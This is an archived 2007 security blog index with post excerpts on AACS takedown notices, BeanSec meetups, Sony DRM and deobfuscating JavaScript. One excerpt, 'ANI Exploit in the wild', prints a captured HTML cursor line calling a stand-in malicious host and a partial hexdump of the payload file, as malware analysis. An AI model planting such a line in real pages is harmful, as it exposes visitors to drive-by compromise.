You are viewing a read-only archive of the Blogs.Harvard network. Learn more.
Skip to content

Monthly Archives: April 2007

official unlegal color palette

Available at search for “append c0”

unlegal color palette?


AACS Takedown notice forces blogger to alter content

The take down notice from AACS has caused one blogger to alter the contents of his blog which is located at this url: The AACS has taken issue with the magic key which is a 16 digit hexadecimal code that can unlock HD DVD and allow for lawful backups or unlawful copying. Here is […]

AACS starts sending take down notices over Processing Key

According to Chilling Effects the take down notices have started flowing in the latest round of battle over the HD format. More information about AACS can be found on Ed Felten’s Blog series: 1, 2, 3, 4, 5, 6, 7, 8, 9 Alex wrote on Thursday about the next step in the breakdown of AACS, […]

Calculating an ASNs IP Space

I couldn’t think of a good easy way to save a bunch of telnet addresses so I’m just going to blog them. I’m using BGP tables to calculate the theoretical IP space a given ASN has. I parse the table and use the CIDR notation to calculate how big the space can be and then […]

Beansec 8 (or 9.. I’ve lost count)

The next Beansec! is imminent and one of the tripartite forces of the Beansec! has provided a Google calendar to help keep track. If you are afraid of Google owning your calendaring information then scribble Wednesday down on some tin foil along with this description: BeanSec! is an informal meetup of information security professionals, researchers […]

Sony DVD DRM breaks own DVD Player.

Sony has released another DRM scheme on at least two known DVDs which will cause certain DVD hardware players to crash. The irony is that one of the models is a recent Sony DVP-CX995V and no updated firmware is available as of yet. No word on whether the DRM from Sony will crash other brands […]

Beansec next Wednesday

Yesterday was the 2nd Wednesday of the month which means only one week till Beansec! BeanSec! is an informal meetup of information security professionals, researchers and academics in the Greater Boston area. Unlike other meetings, you will not be expected to pay dues, “join up”, present a zero-day exploit, or defend your dissertation to attend. […]

ANI Exploit in the wild

<DIV style=”CURSOR: url(‘http://EVIL.SITE/x/anifile.php’)”></DIV> This was found after unraveling a few layers of dense javascript obfuscation. function dF(s) { var s1 = unescape(s.substr(0,s.length-1)); var t=”; for (i=0;i < s1.length;i++) t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1)); alert(unescape(t)); } oday@silver-surfer:~$ hexdump anifile.php 0000000 4952 4646 4022 0000 4341 4e4f 6e61 6869 0000010 0024 0000 0024 0000 ffff 0000 0009 0000 0000020 0000 0000 […]

Interesting technique for reading obfuscated javascript

I have some tricks that I use to unravel obfuscated code but came upon this one tonight from dwesemann at function showme(txt) { document.write(“<textarea rows=”50″ cols=”50″>”);document.write(txt); document.write(“</textarea>”); } It’s nice in that you simply replace escape or document.write(ln) with showme and it will create a text box. I normally use the extremely lazy method […]